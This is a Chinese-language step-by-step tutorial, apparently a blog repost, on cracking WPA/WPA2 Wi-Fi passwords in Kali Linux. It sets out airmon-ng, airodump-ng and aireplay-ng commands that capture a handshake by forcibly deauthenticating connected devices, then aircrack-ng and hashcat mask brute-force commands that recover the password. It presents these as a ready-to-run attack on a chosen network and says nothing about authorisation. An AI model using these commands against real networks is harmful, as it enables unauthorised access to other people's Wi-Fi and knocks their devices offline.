hashcat破解wifi密码(kali)

第一步 将网卡处于监听状态

airmon-ng check 
airmon-ng check kill // 关闭影响监听状态的进程
airmon-ng start wlan0 

第二步 扫描可用wifi

airodump-ng wlan0mon

第三部 获取wifi的握手包

airodump-ng -c (上一步扫描的CH) --bssid (想要破解wifi的ssid) -w (握手文件存放目录) wlan0mon

注意:得到wifi的握手包需要有设备连接在该wifi下,原理是将该连接的设备提下线,该设备会重新连接,我们就可以获得该设备连接wifi时所发送的握手包。

将该wifi下的设备强制踢下去

aireplay-ng -0 0 -a (要破解的wifi的ssid) -c (强制踢下的设备的ssid) wlan0mon

当右上角出现WPA handshake ****的时候说明获取成功

第四部 破解密码

  • 使用aircrack-ng 破解,该方法需要字典,效率低并且成功率不高
aircrack-ng -a2 -b (破解wifi的ssid) -w (字典文件) *.cap(以cap后缀文件握手包)
  • 使用hashcat来破解,可以使用字典也可以不使用字典(这里只讲不适用字典的情况)

1 将握手包转换成hccap格式

aircrack-ng *.cap -J wpahashcat

2 进行破解

hashcat -m 2500 -a 3 wpahash.hccap ?d?d?d?d

-m 2500:代表破解WPA/WPA2

-a 3:使用掩码暴力破解

wpahash.hccap: 为上一步转换的hccap文件,若是提示“Old hccap format detected! You need to update”可以将第一步的命令改为

aircrack-ng *.cap -j wpahashcat //生成wpahashcat.hccapx文件

后面的字符:

hashcat破解wifi密码(kali)_第1张图片

但如果我们不确定某一位到底是数字还是字母怎么写组合呢?这时候就要用到高级组合:

比如设置 --custom-charset1=?l?d 那么就表示 ?1代表小写字母与数字组合,那么8位随机的数字与小写字母组合可以写成 ?1?1?1?1?1?1?1?1,完整的例子:
hashcat test.txt -a 3 -m 0 
--custom-charset1=?l?d ?1?1?1?1?1?1?1?1
再比如设置 
--custom-charset2=xiao106347 那么就表示 ?2 代表字符串由 x i a o 1 0 6 3 4 7 组成的所有可能组合,完整例子:
hashcat test.txt -a 3 -m 0 
--custom-charset2=xiao106347 ?2?2?2?2?2?2?2?2

注意:1、如果提示“not a native intel openCL runtime“可以直接在后面加上 --force强制运行

          2、如果是使用虚拟机运行可能会出现“Device #1: This device's constant buffer size is too small.
Device #1: This device's local mem size is too small”此时将虚拟机的处理器改为单核处理器

hashcat破解wifi密码(kali)_第2张图片

你可能感兴趣的:(网络)